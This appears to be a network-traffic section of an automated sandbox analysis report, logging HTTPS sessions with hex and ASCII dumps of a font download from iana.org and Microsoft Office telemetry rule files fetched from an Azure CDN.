                            2024-10-10 08:17:42 UTC592OUTGET /_img/2022/fonts/NotoSans-Bold.woff HTTP/1.1
                            Host: www.iana.org
                            Connection: keep-alive
                            sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                            Origin: http://www.iana.org
                            sec-ch-ua-mobile: ?0
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                            sec-ch-ua-platform: "Windows"
                            Accept: */*
                            Sec-Fetch-Site: cross-site
                            Sec-Fetch-Mode: cors
                            Sec-Fetch-Dest: font
                            Referer: https://www.iana.org/_css/2022/iana_website.css
                            Accept-Encoding: gzip, deflate, br
                            Accept-Language: en-US,en;q=0.9
                            2024-10-10 08:17:42 UTC1077INHTTP/1.1 200 OK
                            Date: Thu, 10 Oct 2024 07:21:16 GMT
                            Server: Apache
                            Last-Modified: Tue, 05 Oct 2021 16:31:06 GMT
                            Content-Length: 156596
                            Age: 3433
                            X-Content-Type-Options: nosniff
                            Vary: Accept-Encoding
                            X-Frame-Options: DENY
                            X-Content-Type-Options: nosniff
                            Referrer-Policy: same-origin
                            Cross-Origin-Opener-Policy: same-origin
                            Cache-Control: public, s-maxage=86402, max-age=604814
                            Expires: Thu, 10 Oct 2024 07:51:16 GMT
                            Content-Security-Policy: upgrade-insecure-requests; default-src 'self' https://*.iana.org; script-src 'self' 'unsafe-inline' 'unsafe-eval' https://www.google.com https://cse.google.com https://clients1.google.com; style-src 'self' 'unsafe-inline' https://www.google.com; child-src 'self' https://www.youtube.com https://clients1.google.com https://cse.google.com https://www.google.com/; img-src 'self' https://data.iana.org https://www.iana.org https://www.google.com https://www.googleapis.com https://clients1.google.com https://*.gstatic.com;
                            Connection: close
                            Content-Type: font/woff
                            Strict-Transport-Security: max-age=48211200; preload
                            2024-10-10 08:17:42 UTC5777INData Raw: 77 4f 46 46 00 01 00 00 00 02 63 b4 00 0f 00 00 00 04 83 80 00 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 47 44 45 46 00 00 01 58 00 00 01 38 00 00 01 a0 35 0e 28 1b 47 50 4f 53 00 00 02 90 00 00 51 a7 00 00 a6 1e c9 c2 8d 0d 47 53 55 42 00 00 54 38 00 00 05 31 00 00 09 60 46 0c 8f 23 4f 53 2f 32 00 00 59 6c 00 00 00 60 00 00 00 60 f9 f5 f7 27 63 6d 61 70 00 00 59 cc 00 00 0c 72 00 00 0f b0 52 ed 6e c1 67 61 73 70 00 00 66 40 00 00 00 0c 00 00 00 0c 00 08 00 1b 67 6c 79 66 00 00 66 4c 00 01 3a bb 00 02 18 cc ce 7c 94 21 68 65 61 64 00 01 a1 08 00 00 00 36 00 00 00 36 f9 34 09 90 68 68 65 61 00 01 a1 40 00 00 00 21 00 00 00 24 0f 24 0d 37 68 6d 74 78 00 01 a1 64 00 00 10 c8 00 00 25 be a8 55 13 aa 6b 65 72 6e 00 01 b2 2c 00 00 6d
                            Data Ascii: wOFFcGDEFX85(GPOSQGSUBT81`F#OS/2Yl``'cmapYrRngaspf@glyffL:|!head664hhea@!$$7hmtxd%Ukern,m
                            2024-10-10 08:17:42 UTC6800INData Raw: a3 ed 2e 74 e0 14 c7 e9 48 e3 69 b6 46 1d f7 7e 80 4f 99 5c df 63 bc bb 9d e5 4e 24 b6 4b da f7 95 72 8d b6 4a 1d 94 8b b4 ef 60 fd 81 6c a7 8d 25 df 76 ec 24 e5 6d 95 c3 5b 4a a3 49 39 7c 95 63 a6 95 43 89 97 96 73 90 d8 04 3e 7b 81 f5 7b b0 97 71 bc 5b cb 91 94 52 4e 36 72 a6 db 9d b8 4b b8 e1 c9 e5 08 ff c2 9a ff 45 1e 16 b2 df 1f f0 a9 45 5c cd 4f b2 ce b3 4e 4c 28 2b a8 93 92 1a 1f 65 9d 67 69 51 ef a6 a7 63 bc a7 07 51 6e a7 5d 4d 88 0d 91 54 9b b2 52 fa 20 d3 79 52 e2 49 48 4d df 59 8e f3 0d f6 9b a0 ac be e1 c4 0c 9c cb 97 9c d8 9e b1 ee db 52 e2 7b d2 89 e4 a5 44 5f e4 18 ea af ae e5 78 44 77 fe 93 fd fe 0f 67 7a 8c 3c 9c ce 11 0e 74 a2 02 b6 53 c1 f1 c7 24 f5 30 42 f0 31 d2 36 4e b0 e6 18 3e 95 4f ef dc cc 92 0f 72 54 73 c9 ed b5 ac 3f 89 75 a6
                            Data Ascii: .tHiF~O\cN$KrJ`l%v$m[JI9|cCs>{{q[RN6rKEE\ONL(+egiQcQn]MTR yRIHMYR{D_xDwgz<tS$0B16N>OrTs?u


                            Session IDSource IPSource PortDestination IPDestination Port
                            24192.168.2.44978613.107.246.45443
                            TimestampBytes transferredDirectionData
                            2024-10-10 08:17:45 UTC195OUTGET /rules/other-Win32-v19.bundle HTTP/1.1
                            Connection: Keep-Alive
                            Accept-Encoding: gzip
                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                            Host: otelrules.azureedge.net
                            2024-10-10 08:17:46 UTC561INHTTP/1.1 200 OK
                            Date: Thu, 10 Oct 2024 08:17:45 GMT
                            Content-Type: text/plain
                            Content-Length: 218853
                            Connection: close
                            Vary: Accept-Encoding
                            Vary: Accept-Encoding
                            Vary: Accept-Encoding
                            Vary: Accept-Encoding
                            Cache-Control: public
                            Last-Modified: Wed, 09 Oct 2024 03:56:29 GMT
                            ETag: "0x8DCE8165B436280"
                            x-ms-request-id: 933bb64d-501e-00a3-36e1-1ac0f2000000
                            x-ms-version: 2018-03-28
                            x-azure-ref: 20241010T081745Z-185b7d577bd8m52vbwet1cqbbw00000002a0000000008vx1
                            x-fd-int-roxy-purgeid: 0
                            X-Cache: TCP_HIT
                            X-Cache-Info: L1_T2
                            Accept-Ranges: bytes
                            2024-10-10 08:17:46 UTC15823INData Raw: 31 30 30 30 76 35 2b 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 30 30 30 22 20 56 3d 22 35 22 20 44 43 3d 22 45 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 52 75 6c 65 45 72 72 6f 72 73 41 67 67 72 65 67 61 74 65 64 22 20 41 54 54 3d 22 66 39 39 38 63 63 35 62 61 34 64 34 34 38 64 36 61 31 65 38 65 39 31 33 66 66 31 38 62 65 39 34 2d 64 64 31 32 32 65 30 61 2d 66 63 66 38 2d 34 64 63 35 2d 39 64 62 62 2d 36 61 66 61 63 35 33 32 35 31 38 33 2d 37 34 30 35 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 53 3d 22 37 30 22 20 44 4c 3d 22 41 22 20 44 43 61 3d 22 50 53 50 20 50 53 55 22 20
                            Data Ascii: 1000v5+<?xml version="1.0" encoding="utf-8"?><R Id="1000" V="5" DC="ESM" EN="Office.Telemetry.RuleErrorsAggregated" ATT="f998cc5ba4d448d6a1e8e913ff18be94-dd122e0a-fcf8-4dc5-9dbb-6afac5325183-7405" SP="CriticalBusinessImpact" S="70" DL="A" DCa="PSP PSU"
                            2024-10-10 08:17:46 UTC16384INData Raw: 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 2f 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 2f 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 52 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 56 20 56 3d 22 34 30 30 22 20 54 3d 22 49 33 32 22 20 2f 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 2f 52 3e 0d 0a 20 20 20 20 20 20 20 20 3c 2f 4f 3e 0d 0a 20 20 20 20 20 20 3c 2f 52 3e 0d 0a 20 20 20 20 3c 2f 4f 3e 0d 0a 20 20 3c 2f 43 3e 0d 0a 20 20 3c 43 20 54 3d 22 42 22 20 49 3d 22 35 22 20 4f 3d 22 66 61 6c 73 65 22 3e 0d 0a 20 20 20 20 3c 4f 20 54 3d 22 41 4e 44 22 3e 0d 0a 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4f 20 54 3d 22 47 45 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20
                            Data Ascii: <S T="1" F="0" /> </L> <R> <V V="400" T="I32" /> </R> </O> </R> </O> </C> <C T="B" I="5" O="false"> <O T="AND"> <L> <O T="GE"> <L>
                            2024-10-10 08:17:46 UTC16384INData Raw: 3c 53 20 54 3d 22 33 22 20 2f 3e 0d 0a 20 20 3c 2f 54 3e 0d 0a 20 20 3c 53 54 3e 0d 0a 20 20 20 20 3c 53 20 54 3d 22 31 22 20 2f 3e 0d 0a 20 20 3c 2f 53 54 3e 0d 0a 3c 2f 52 3e 0d 0a 3c 24 21 23 3e 31 30 38 32 30 76 33 2b 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 30 38 32 30 22 20 56 3d 22 33 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 4f 75 74 6c 6f 6f 6b 2e 44 65 73 6b 74 6f 70 2e 43 6f 6e 74 61 63 74 43 61 72 64 50 72 6f 70 65 72 74 69 65 73 43 6f 75 6e 74 73 22 20 41 54 54 3d 22 64 38 30 37 36 30 39 32 37 36 37 34 34 32 34 35 62 61 66 38 31 62 66 37 62 63 38 30 33 33 66 36 2d 32 32 36 38 65 33 37 34 2d 37 37 36 36 2d 34 39 37 36 2d
                            Data Ascii: <S T="3" /> </T> <ST> <S T="1" /> </ST></R><$!#>10820v3+<?xml version="1.0" encoding="utf-8"?><R Id="10820" V="3" DC="SM" EN="Office.Outlook.Desktop.ContactCardPropertiesCounts" ATT="d807609276744245baf81bf7bc8033f6-2268e374-7766-4976-
                            2024-10-10 08:17:46 UTC16384INData Raw: 6e 74 73 22 20 2f 3e 0d 0a 20 20 3c 2f 43 3e 0d 0a 20 20 3c 43 20 54 3d 22 55 36 34 22 20 49 3d 22 38 22 20 4f 3d 22 66 61 6c 73 65 22 20 4e 3d 22 45 76 65 6e 74 73 5f 41 76 67 22 3e 0d 0a 20 20 20 20 3c 53 20 54 3d 22 32 22 20 46 3d 22 41 76 65 72 61 67 65 22 20 2f 3e 0d 0a 20 20 3c 2f 43 3e 0d 0a 20 20 3c 43 20 54 3d 22 55 33 32 22 20 49 3d 22 39 22 20 4f 3d 22 74 72 75 65 22 20 4e 3d 22 50 75 72 67 65 64 5f 41 67 65 22 3e 0d 0a 20 20 20 20 3c 53 20 54 3d 22 34 22 20 46 3d 22 43 6f 75 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 43 3e 0d 0a 20 20 3c 43 20 54 3d 22 55 33 32 22 20 49 3d 22 31 30 22 20 4f 3d 22 74 72 75 65 22 20 4e 3d 22 50 75 72 67 65 64 5f 43 6f 75 6e 74 22 3e 0d 0a 20 20 20 20 3c 53 20 54 3d 22 35 22 20 46 3d 22 43 6f 75 6e 74 22 20 2f 3e 0d 0a
                            Data Ascii: nts" /> </C> <C T="U64" I="8" O="false" N="Events_Avg"> <S T="2" F="Average" /> </C> <C T="U32" I="9" O="true" N="Purged_Age"> <S T="4" F="Count" /> </C> <C T="U32" I="10" O="true" N="Purged_Count"> <S T="5" F="Count" />
                            2024-10-10 08:17:46 UTC16384INData Raw: 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 55 33 32 22 20 49 3d 22 30 22 20 4f 3d 22 66 61 6c 73 65 22 20 4e 3d 22 43 6f 75 6e 74 5f 43 72 65 61 74 65 43 61 72 64 5f 56 61 6c 69 64 50 65 72 73 6f 6e 61 5f 46 61 6c 73 65 22 3e 0d 0a 20 20 20 20 3c 43 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 30 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 43 3e 0d 0a 20 20 3c 2f 43 3e 0d 0a 20 20 3c 43 20 54 3d 22 55 33 32 22 20 49 3d 22 31 22 20 4f 3d 22 66 61 6c 73 65 22 20 4e 3d 22 43 6f 75 6e 74 5f 43 72 65 61 74 65 43 61 72 64 5f 56 61 6c 69 64 4d 61 6e 61 67 65 72 5f 46 61 6c 73 65 22 3e 0d 0a 20 20 20 20 3c 43 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 43 3e 0d 0a 20 20 3c 2f 43 3e 0d 0a 20 20 3c 43 20 54 3d 22 55 33 32 22 20
                            Data Ascii: </S> <C T="U32" I="0" O="false" N="Count_CreateCard_ValidPersona_False"> <C> <S T="10" /> </C> </C> <C T="U32" I="1" O="false" N="Count_CreateCard_ValidManager_False"> <C> <S T="11" /> </C> </C> <C T="U32"
                            2024-10-10 08:17:46 UTC16384INData Raw: 5f 43 6f 75 6e 74 22 3e 0d 0a 20 20 20 20 3c 43 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 33 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 43 3e 0d 0a 20 20 3c 2f 43 3e 0d 0a 20 20 3c 43 20 54 3d 22 55 33 32 22 20 49 3d 22 31 39 22 20 4f 3d 22 66 61 6c 73 65 22 20 4e 3d 22 50 61 69 6e 74 5f 49 4d 73 6f 50 65 72 73 6f 6e 61 5f 57 61 73 4e 75 6c 6c 5f 43 6f 75 6e 74 22 3e 0d 0a 20 20 20 20 3c 43 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 33 32 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 43 3e 0d 0a 20 20 3c 2f 43 3e 0d 0a 20 20 3c 43 20 54 3d 22 55 33 32 22 20 49 3d 22 32 30 22 20 4f 3d 22 66 61 6c 73 65 22 20 4e 3d 22 50 61 69 6e 74 5f 49 4d 73 6f 50 65 72 73 6f 6e 61 5f 4e 75 6c 6c 5f 43 6f 75 6e 74 22 3e 0d 0a 20 20 20 20 3c 43 3e 0d 0a 20 20 20 20 20 20 3c 53 20
                            Data Ascii: _Count"> <C> <S T="31" /> </C> </C> <C T="U32" I="19" O="false" N="Paint_IMsoPersona_WasNull_Count"> <C> <S T="32" /> </C> </C> <C T="U32" I="20" O="false" N="Paint_IMsoPersona_Null_Count"> <C> <S
                            2024-10-10 08:17:46 UTC16384INData Raw: 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 33 22 20 46 3d 22 52 65 74 72 69 65 76 61 6c 4d 69 6c 6c 69 73 65 63 6f 6e 64 73 22 20 2f 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 52 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 56 20 56 3d 22 32 30 30 22 20 54 3d 22 49 36 34 22 20 2f 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 52 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 2f 4f 3e 0d 0a 20 20 20 20 20 20 20 20 3c 2f 4c 3e 0d 0a 20 20 20 20 20 20 20 20 3c 52 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 4f 20 54 3d 22 4c 54 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 33 22
                            Data Ascii: <L> <S T="3" F="RetrievalMilliseconds" /> </L> <R> <V V="200" T="I64" /> </R> </O> </L> <R> <O T="LT"> <L> <S T="3"
                            2024-10-10 08:17:46 UTC16384INData Raw: 20 20 20 20 20 20 3c 2f 4c 3e 0d 0a 20 20 20 20 20 20 20 20 3c 52 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 56 20 56 3d 22 30 22 20 54 3d 22 49 33 32 22 20 2f 3e 0d 0a 20 20 20 20 20 20 20 20 3c 2f 52 3e 0d 0a 20 20 20 20 20 20 3c 2f 4f 3e 0d 0a 20 20 20 20 3c 2f 46 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 55 33 32 22 20 49 3d 22 30 22 20 4f 3d 22 66 61 6c 73 65 22 20 4e 3d 22 4f 63 6f 6d 32 49 55 43 4f 66 66 69 63 65 49 6e 74 65 67 72 61 74 69 6f 6e 46 69 72 73 74 43 61 6c 6c 53 75 63 63 65 73 73 43 6f 75 6e 74 22 3e 0d 0a 20 20 20 20 3c 43 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 43 3e 0d 0a 20 20 3c 2f 43 3e 0d 0a 20 20 3c 43 20 54 3d 22 55 33 32 22 20 49 3d 22 31 22 20 4f 3d 22 66 61 6c 73 65
                            Data Ascii: </L> <R> <V V="0" T="I32" /> </R> </O> </F> </S> <C T="U32" I="0" O="false" N="Ocom2IUCOfficeIntegrationFirstCallSuccessCount"> <C> <S T="9" /> </C> </C> <C T="U32" I="1" O="false
                            2024-10-10 08:17:46 UTC16384INData Raw: 20 54 3d 22 42 22 20 2f 3e 0d 0a 20 20 20 20 20 20 20 20 3c 2f 52 3e 0d 0a 20 20 20 20 20 20 3c 2f 4f 3e 0d 0a 20 20 20 20 3c 2f 46 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 36 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 41 4e 44 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 33 22 20 46 3d 22 54 65 6e 61 6e 74 20 65 6e 61 62 6c 65 64 22 20 2f 3e 0d 0a 20 20 20 20 20 20 20 20 3c 2f 4c 3e 0d 0a 20 20 20 20 20 20 20 20 3c 52 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 33 22 20 46 3d 22 55 73 65 72 20 65 6e 61 62 6c 65 64 22 20 2f 3e 0d 0a 20 20 20 20 20 20 20 20 20
                            Data Ascii: T="B" /> </R> </O> </F> <F T="6"> <O T="AND"> <L> <S T="3" F="Tenant enabled" /> </L> <R> <O T="EQ"> <L> <S T="3" F="User enabled" />
                            2024-10-10 08:17:46 UTC16384INData Raw: 4f 3e 0d 0a 20 20 20 20 3c 2f 46 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 36 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 32 22 20 46 3d 22 48 74 74 70 53 74 61 74 75 73 22 20 2f 3e 0d 0a 20 20 20 20 20 20 20 20 3c 2f 4c 3e 0d 0a 20 20 20 20 20 20 20 20 3c 52 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 56 20 56 3d 22 34 30 34 22 20 54 3d 22 55 33 32 22 20 2f 3e 0d 0a 20 20 20 20 20 20 20 20 3c 2f 52 3e 0d 0a 20 20 20 20 20 20 3c 2f 4f 3e 0d 0a 20 20 20 20 3c 2f 46 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 37 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 41 4e 44 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 4f 20 54
                            Data Ascii: O> </F> <F T="6"> <O T="EQ"> <L> <S T="2" F="HttpStatus" /> </L> <R> <V V="404" T="U32" /> </R> </O> </F> <F T="7"> <O T="AND"> <L> <O T


                            Session IDSource IPSource PortDestination IPDestination Port
                            25192.168.2.44978813.107.246.45443
                            TimestampBytes transferredDirectionData
                            2024-10-10 08:17:47 UTC192OUTGET /rules/rule224902v2s19.xml HTTP/1.1
                            Connection: Keep-Alive
                            Accept-Encoding: gzip
                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                            Host: otelrules.azureedge.net
                            2024-10-10 08:17:48 UTC470INHTTP/1.1 200 OK
                            Date: Thu, 10 Oct 2024 08:17:48 GMT
                            Content-Type: text/xml
                            Content-Length: 450
                            Connection: close
                            Cache-Control: public, max-age=604800, immutable
                            Last-Modified: Tue, 09 Apr 2024 00:27:25 GMT
                            ETag: "0x8DC582BD4C869AE"
                            x-ms-request-id: 8437bbaa-c01e-007a-1374-1ab877000000
                            x-ms-version: 2018-03-28
                            x-azure-ref: 20241010T081748Z-185b7d577bdgsgcm5251kab51w00000001rg00000000br7c
                            x-fd-int-roxy-purgeid: 0
                            X-Cache: TCP_HIT
                            Accept-Ranges: bytes
                            2024-10-10 08:17:48 UTC450INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 32 32 34 39 30 32 22 20 56 3d 22 32 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 31 30 30 22 20 2f 3e 0d 0a 20 20 20 20 3c 55 54 53 20 54 3d 22 32 22 20 49 64 3d 22 62 62 72 35 71 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 53 20 54 3d 22 33 22 20 47 3d 22 7b 61 33 36 61 39 37 30 64 2d 34 35 61 39 2d 34 65 30 64 2d 39 63 61 62 2d 32 61 32 33 35 63 63 39 64 37 63 36 7d 22 20 2f 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 47 22 20 49 3d 22 30 22 20 4f 3d 22 66 61 6c 73 65 4e
                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="224902" V="2" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120100" /> <UTS T="2" Id="bbr5q" /> <SS T="3" G="{a36a970d-45a9-4e0d-9cab-2a235cc9d7c6}" /> </S> <C T="G" I="0" O="falseN


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            26192.168.2.44979013.107.246.454431360C:\Program Files\Google\Chrome\Application\chrome.exe
                            TimestampBytes transferredDirectionData
                            2024-10-10 08:17:47 UTC192OUTGET /rules/rule120600v4s19.xml HTTP/1.1
                            Connection: Keep-Alive
                            Accept-Encoding: gzip
                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                            Host: otelrules.azureedge.net
                            2024-10-10 08:17:48 UTC563INHTTP/1.1 200 OK
                            Date: Thu, 10 Oct 2024 08:17:48 GMT
                            Content-Type: text/xml
                            Content-Length: 2980
                            Connection: close
                            Vary: Accept-Encoding
                            Vary: Accept-Encoding
                            Vary: Accept-Encoding
                            Vary: Accept-Encoding
                            Cache-Control: public, max-age=604800, immutable
                            Last-Modified: Tue, 09 Apr 2024 00:26:10 GMT
                            ETag: "0x8DC582BA80D96A1"
                            x-ms-request-id: 38350f62-a01e-0021-1402-1a814c000000
                            x-ms-version: 2018-03-28
                            x-azure-ref: 20241010T081748Z-185b7d577bd8m52vbwet1cqbbw000000028000000000dk5b
                            x-fd-int-roxy-purgeid: 0
                            X-Cache: TCP_HIT
                            Accept-Ranges: bytes
                            2024-10-10 08:17:48 UTC2980INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 30 30 22 20 56 3d 22 34 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 53 79 73 74 65 6d 2e 53 79 73 74 65 6d 48 65 61 6c 74 68 4d 65 74 61 64 61 74 61 44 65 76 69 63 65 43 6f 6e 73 6f 6c 69 64 61 74 65 64 22 20 41 54 54 3d 22 63 64 38 33 36 36 32 36 36 31 31 63 34 63 61 61 61 38 66 63 35 62 32 65 37 32 38 65 65 38 31 64 2d 33 62 36 64 36 63 34 35 2d 36 33 37 37 2d 34 62 66 35 2d 39 37 39 32 2d 64 62 66 38 65 31 38 38 31 30 38 38 2d 37 35 32 31 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 44 43 61 3d 22 44 43 22 20
                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120600" V="4" DC="SM" EN="Office.System.SystemHealthMetadataDeviceConsolidated" ATT="cd836626611c4caaa8fc5b2e728ee81d-3b6d6c45-6377-4bf5-9792-dbf8e1881088-7521" SP="CriticalBusinessImpact" DL="A" DCa="DC"


                            Session IDSource IPSource PortDestination IPDestination Port
                            27192.168.2.44979213.107.246.45443
                            TimestampBytes transferredDirectionData
                            2024-10-10 08:17:48 UTC192OUTGET /rules/rule120609v0s19.xml HTTP/1.1
                            Connection: Keep-Alive
                            Accept-Encoding: gzip
                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                            Host: otelrules.azureedge.net
                            2024-10-10 08:17:48 UTC470INHTTP/1.1 200 OK
                            Date: Thu, 10 Oct 2024 08:17:48 GMT
                            Content-Type: text/xml
                            Content-Length: 408
                            Connection: close
                            Cache-Control: public, max-age=604800, immutable
                            Last-Modified: Tue, 09 Apr 2024 00:26:33 GMT
                            ETag: "0x8DC582BB56D3AFB"
                            x-ms-request-id: c0e2c5aa-701e-0098-1461-1a395f000000
                            x-ms-version: 2018-03-28
                            x-azure-ref: 20241010T081748Z-185b7d577bdfx2dd0gsb231cq00000000260000000002hvp
                            x-fd-int-roxy-purgeid: 0
                            X-Cache: TCP_HIT
                            Accept-Ranges: bytes
                            2024-10-10 08:17:48 UTC408INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 30 39 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 38 32 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 5e 28 5b 44 64 5d 5b 45 65 5d 5b 4c 6c 5d 5b 4c 6c 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72 75 65 22 3e 0d 0a 20 20
                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120609" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120682" /> <SR T="2" R="^([Dd][Ee][Ll][Ll])"> <S T="1" F="0" M="Ignore" /> </SR> </S> <C T="W" I="0" O="true">


                            Session IDSource IPSource PortDestination IPDestination Port
                            28192.168.2.44978913.107.246.45443
                            TimestampBytes transferredDirectionData
                            2024-10-10 08:17:48 UTC193OUTGET /rules/rule120402v21s19.xml HTTP/1.1
                            Connection: Keep-Alive
                            Accept-Encoding: gzip
                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                            Host: otelrules.azureedge.net
                            2024-10-10 08:17:48 UTC563INHTTP/1.1 200 OK
                            Date: Thu, 10 Oct 2024 08:17:48 GMT
                            Content-Type: text/xml
                            Content-Length: 3788
                            Connection: close
                            Vary: Accept-Encoding
                            Vary: Accept-Encoding
                            Vary: Accept-Encoding
                            Vary: Accept-Encoding
                            Cache-Control: public, max-age=604800, immutable
                            Last-Modified: Tue, 09 Apr 2024 00:26:17 GMT
                            ETag: "0x8DC582BAC2126A6"
                            x-ms-request-id: d01aae37-c01e-007a-5dfb-19b877000000
                            x-ms-version: 2018-03-28
                            x-azure-ref: 20241010T081748Z-185b7d577bdwmw4ckbc4ywwmwg00000001u0000000003a0w
                            x-fd-int-roxy-purgeid: 0
                            X-Cache: TCP_HIT
                            Accept-Ranges: bytes
